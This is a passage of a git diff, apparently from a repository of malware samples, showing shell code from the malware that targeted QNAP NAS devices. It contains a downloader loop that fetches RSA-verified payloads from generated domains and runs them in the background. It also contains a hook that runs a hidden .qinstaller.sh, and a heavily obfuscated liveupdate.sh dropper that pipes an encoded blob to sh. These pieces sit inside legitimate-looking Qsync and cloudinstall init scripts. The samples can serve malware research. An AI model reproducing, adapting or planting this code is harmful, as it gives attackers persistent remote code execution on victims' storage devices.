curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
{ /share/CACHEDEV1_DATA/.system/.qinstaller.sh; exit 0; }
|
||||
fi
|
||||
fi
|
630
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/5130282cdb4e371b5b9257e6c992fb7c11243b2511a6d4185eafc0faa0e0a3a6
Normal file
630
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/5130282cdb4e371b5b9257e6c992fb7c11243b2511a6d4185eafc0faa0e0a3a6
Normal file
@ -0,0 +1,630 @@
|
||||
#!/bin/sh
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -d "$confdir" || confdir=/etc/config
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
test "$fgrep" || fgrep=grep
|
||||
|
||||
if [ ! -f "${bdir}/.qpkg/.liveupdate/liveupdate.sh" ]; then
|
||||
test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cat > "${bdir}/.qpkg/.liveupdate/liveupdate.sh" <<"XEOF"
|
||||
#!/bin/sh
|
||||
xdEIZP=${ChSqzKBSW}t${fndSX}r${RiADoEekYl}
|
||||
CHQOUaEF=${mKukBzqlFWte}${RcAgv}'\'${CzwGKoExdSNb}${oqEoH}; ZdBaYuwO=${uSWVs}${wtxOLMzrX}${zUlDx}${CHQOUaEF}${hnTYzqNIR}${WEJkC}${kMhyJjnAFI}133; FALbYHfu=${VZmgi}${VEElEOlov}${eDUDq}${CHQOUaEF}${iBBKUXigc}${QSddu}${JpoASfGrvy}055; ivTDLYcJ=${oVdmD}${BoQprMhPn}${ooVsb}${CHQOUaEF}${CYldesVQs}${AZyIt}${FImBFvbeBf}134; $xdEIZP 'O)sjM{bTXIL'$ivTDLYcJ'xq"}h*ig%PckK;\nE#Qm'$ZdBaYuwO'n'"'"'=So+Uu(W BvCarF!]N|'$FALbYHfu'YztG<HJ$RDVZedf`yAp&l>w' '{qjLaI` +F)'$ZdBaYuwO'cYsu]#%'$FALbYHfu'e;fNGk<Mx$pQO(UBy=VKTPb!g'"'"'*nJrv'$ivTDLYcJ'SX&zWwtR>\nmEhi"}A|lDHoZCd' << "cLgBgGVGUVG" | ${czsznolvy}s${oLDnn}h${RWzWuKOHEj}
|
||||
>p)yDAmrqz+QO<{>=D!d/V&QOnok rU[uuffAdR%/QOEH%>t!tk!dV<QO-jZw%nAFxHF!d<mQO<|%nx]mIR((rdw/QOjE&sKud"oQO;[#Evv%D>Z=H"tqd"y&QO}qEr kdv.xvQORFFSAxjlVHc-dZQO!K%>pKkstd$QOjKcUs Aud<!QOUAyHjzW}syU%dQOwtA|ERdTCTBR%`u NrfLFPWmckO]+aHIoJzyDUSAp(i<vE!bCeCeCM}n'sqYN055hj[N133l{w;K-"x&
|
||||
>N134#t=QeV|G*)ZdXrCTCVUMm`K(iN055aPECeCeCYNrJO{%=-)t'Z
|
||||
kLsp]+Ge&"dqryIvQ|>Hu;<Ao}nN134fxD Xw#N133*jBbThcRlSWz[F!C
|
||||
|
||||
e|A[F"ISm|AVeJQ>p)yDAmrqz$Nt/"zC/ETcn+CrEjrQJUQcOQcQQQQMvKRMQE(FcQQQQMvKRMQ|zC('O1:f4!FcQQQQMvKRMQ|R
|
||||
('O2:f12!FcQQQQMvKRMQhE%RK+(<'O3:fRfZ;fG!<cQQQQjrQf&KQ<'hE%RK+<QyQ/&+p/lrRC&v|Q`QOQcQQQQQQQQr+R&QfrCQ'JJ'Y;D[{PQ$QJQ'|R
|
||||
QfQ'|zCQxQ1QUQxQ'|zCQUUQEFcQQQQQQQQ+KTvQ<'E<cQQQQ!c!cKv||RC&QfpQ|hj+|%QkQ/&+p/ClMMQ2km1Q``Q|hj+|%QJUQOQcMvKRMQElVVz
|
||||
(=n+CrEjrQ6Q6=cj+EjQ<'2<QmmQOQ|h&zrQ<'O2$HHHHHH!'ElVVz
|
||||
<FQ+KTvQ<'O2$HHHHHH!'ElVVz
|
||||
<FQ!Q``QOQjvlKTQ<'O1$HHHHHH!'ElVVz
|
||||
<FQ+KTvQ<'O1$$HHHHHH!'ElVVz
|
||||
<FQ!c!c+
|
||||
+KQ2k/&+p/ClMMc); A(<'O); A!:/"zC:/E"zC:/lEr/"zC:/lEr/E"zC:/lEr/"zC/H11:/lEr/MvKRM/E"zC:/lEr/MvKRM/"zC<cj+EjQtQfZQ<'Oda-Yb_s Y]Du!<Q``QOQ%rzCjVQ<[Rj+:Q<FQ G(uP Q&Rj+FQ+
|
||||
zjQ0FQ!c+KTvQ<[Rj+:Qo+&Qs+%Q21Q19:48:17QuP Q2016<cKr(=%rzCjVQWwrWQ``Q+KTvQfC+QWwrW=cj+EjQ<'ONKr!<Qf+IQ1QmmQ+KTvQ<'Kr<Q``Q+KTvQ<<cj+EjQ<
|
||||
'A )_Y-}-Y-Y<Q(Q<
|
||||
&7298"47&745055&4V03&K507VR7K++VV&64+340<Q``Q+
|
||||
zjQ0cj+EjQtQfZQ<'O0!<QmmQj+EjQ=%EQRl
|
||||
Q`Qnr+%Q<'O0!<Q`QiKQfM=QfnjQ40QmmQ+
|
||||
zjQ0cKv||RC&QfpQv%+CEEMQk/&+p/ClMMQ2km1QmmQOc){s [; ;(WWch(<a;&|;4ZrBa3g9;SX;8{s&DRplA76aql2<cj+EjQ<
|
||||
'OY-da-s _P- A{[!<Q(Q
|
||||
){s QmmQj+EjQtQfZQ<'Oda-Yb_s Y]Du!<QmmQKRE+Q<'Oda-Yb_s Y]Du!<QzCQWWQ`QL>t0f9eLQ`Q0LQUQVRME+QFFQ>0f9e>0f9e>0f9e>0f9e>0f9e>0f9e>0f9e>0f9eQUQ&(<'JJQ=&Rj+Qx$E=Q/Q100QUU<FQj+EjQ<'Oda-Yb_s Y]Du!<Q(Q<'O&!<QmmQKj(<'&<Q``QOQj+EjQ<'Oda-Yb_s Y]Du!<Q(Q<'JJQ'&QfQ1UU<QmmQKj(<'JJQ'&QfQ1QUU<FQ!QFFQLUQVRME+QFFQ+ERKQmmQj+EjQtQfZQ<'Oda-Yb_s Y]Du!<QmmQOcCM(WcWcKRE+Q<'Oq{D -D _#-Du A!<QzCQWWQ`QL>t0f9eLQ`Q0LQUQVRME+QFFQLUQj+EjQ<'Oq{D -D _#-Du A!<QfMjQ2147483646QFFQ+ERKQmmQOQ]}s(Qr+R&Qf&QWWQfrCQ<'Oq{D -D _#-Du A!<Q){s [; ;FQj+EjQfZQ<'){s [; ;<QmmQ){s [; ;(=&&Q"E(1QKvlCj(<'q{D -D _#-Du A<Q2k/&+p/ClMM=FQ!Q``Qj+EjQ<'){s [; ;<Q``Q){s [; ;(=KRj=Q``Q+
|
||||
zjQ0cE(<'O){s [; ;NNL.!<cEj(<'OENNLf!<cE(<'OE$$fL!<c&(<'JJQ'&Q/Q1000QUU<cj+EjQtQfZQ<'&<QmmQj+EjQtQfZQ<'Ej<QmmQj+EjQ<'ONEj!<Q(Q5QmmQOQj+EjQ<
|
||||
'Ej<Q(Q<
|
||||
'&<Q``Qj+EjQ<
|
||||
'Ej<Q(Q<
|
||||
'JJQ'&QfQ1QUU<FQ!Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
|
||||
zjQ0FQ!cKRE+Q<'E<QzCQWWQ`QL>tRfZ;fG0f9/x('CMeLQUQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
|
||||
zjQ0FQFFQ+ERKcj(=|hj+|%Q/j|%/.j|%.HHHHHH=Q``Q+
|
||||
zjQ0cKRjQkQ<'j<Qyy<-{}<Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
|
||||
zjQ0FQ!cfffff*-u]DQ)a*#]qQg-bfffffcP]]*vS;D*nhIThzu9i0*;d-};;{q;b8;P]]*zngq;b-;\zuxA/1VK#PV Dapp*+Ec{XI06V{u|*}g]a{q)E\u%;lZ[rqgMC*lAv#4Ts-jCl
|
||||
*Dj8S;*Z&Gx%9Ia";G3{cZR)|X]&E1nAAM1g}xd8A5"D&DE9PqYh-pqanXu}+3;RM#7hxS/YH*EorE#qg&ugocRAx&jq0D&#g&hZTg8I*IZA
|
||||
qxPauZ++5//{n[g&Kg++MRqnZaXR0lz11*G3]Sg%dcM7AvhBA|\ZYrXu)KlK4hMA9"g4s+;[+TY\S\MzpAdKIsg1EDEiR%X|2I[S\d7TSYcY2ER{Zl" ai1x2dgMxP\5sV\v/*8Dv%Db6-;{#8bq)BAqR%I2RV2G\jTRB22B%VbcZjZS-\5{h}DT6VYnGD%"ElPl4C)R*/rnpX|Eo
|
||||
93RCET4]+Hz)\{lgB*R|aG\]p#c
|
||||
r2-sq2rTnoTInXlz#MAuxAPg63)v&*P}\gI9r#&4T99CH"9xzq|}d9VZXgE9ssPcS7
|
||||
R&u%R"g2RD %D3Z[;l-u]4G{jI
|
||||
#IoS-A|0"-xG5};nP*;;-(cfffff-D[Q)a*#]qQg-bfffffc-{}cj+EjQtQfZQ<'E<QmmQT(=v%+CEEMQ"RE+64Qf&Qyy-{}Q`Qv%+CEEMQrERljMQf%l"zCQfzCh+\Q<'j<Qfp+rzV\c'Ec-{}c=Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
|
||||
zjQ0FQ!cj+EjQfVQ<'j<QmmQr|Q<'j<c|(<'O){s [; ;$$.L!<c){s [; ;(WWcKRE+Q<'|<QzCQWWQ`QL>tRfZ;fG0f9/x('CMeLQUQ+
|
||||
zjQ0QFFQ+ERKch(=v%+CEEMQ&nEjQfETR1Qf"zCRr\QfT|RKQ<'Kj<Qyy-{}Q`Qv%+CEEMQ"RE+64c'hc-{}c=c|(=v%+CEEMQ+CKQf&QfR+Ef256fK"KQfhQ<'h<Qf|&QETR1QfERMjQfRQyy-{}c'|c-{}c=c|T(=v%+CEEMQ&nEjQfETR1Qf"zCRr\QfT|RKQ<'Ej<Qyy-{}Q`Qv%+CEEMQ"RE+64c'|c-{}c=cj+EjQtQfZQ<'T<QmmQj+EjQ<'T<Q(Q<'|T<Q``Q+
|
||||
zjQ0c+pRMQ<'|<cjrl+c!Q``QOcj(=|hj+|%Q/j|%/.j|%.HHHHHH=Q``Q+
|
||||
zjQ0cKRjQkQ<'j<Qyy<-{}<Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
|
||||
zjQ0FQ!cfffff*-u]DQ)a*#]qQg-bfffffcP]]*vS;D*nhIThzu9i0*;d-};;{q;b8;P]]*zngq;b-;9d|APi4Si8q{#bgn{IVqc0uGEYsi}nz
|
||||
0MzPK42GsrEErE}uGM[)g35ZM&|"aE-dHj}bh[SB+aKh%2RT8}KVc;*}au8P#CM6i p
|
||||
uGiXX"P#)[zbv5M/&07*gK"iblID%x2//2&lh
|
||||
q\Rh{]]C]I}c#nrP5Cp%5*g**KKPMP*RE}j
|
||||
GV}njDSMd9z9|DVz53CRMrP)YvM9gzVo1b
|
||||
|#i1xc7u lS}sM\g9;%pz/G]2\/p\|6Do"o-ER-5*9nnHXbrB
|
||||
M"g
|
||||
P]ZolHV18s2%48}Tc%Ba\bX0|S[aK3szXY4Yz)zh)% dnhsS\90RPgrvoq;&9P6KGjViqZTP"p\jD|&j&cb
|
||||
*DDC0}|d51K#)Kx&%R]]
|
||||
2z/2Ku&Ab8G;S*[P*P*hS]+2n}nK6MX0o{M 638Zxci7/|)xTKqv#Bazusz-l|Z3a#5)|vBR3i2j04YR70)#o;%uE]/n%A\A0o8z6\B*A-cIaERd
|
||||
C*{}p\xzsv|\}zM2&
|
||||
gd#S i\G*C8x1g|vCX2%;nP*;;-(cfffff-D[Q)a*#]qQg-bfffffc-{}cv%+CEEMQrERljMQf%l"zCQfzCh+\Q<'j<Qf+CKr\%jQyy-{}Q`Qv%+CEEMQ"RE+64c'hc-{}cr|Q<'j<cjrl+Qc!FQjrl+FQ!Q``QOcj+EjQ<
|
||||
';qq-) _#;Dua;u-<Q(Q<
|
||||
53"&00K"5K05912V6+230V+&3308+15V44+7V"4V<QmmQ+pRMQ<'OA )_as-Y_;u-D !<c!cj+EjQfVQ<'j<QmmQr|Q<'j<cEM++%Q1c+
|
||||
zjQ0c$|A[F"ISm|AV$QOSjD=frxp%dxVR&wQOFAuj-IxsdT75QOjo&s)x>xGd5QOn;Ht(|KUdTeQ>p)yDAmrqze$%#Z<T0$$*
|
||||
cLgBgGVGUVG
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
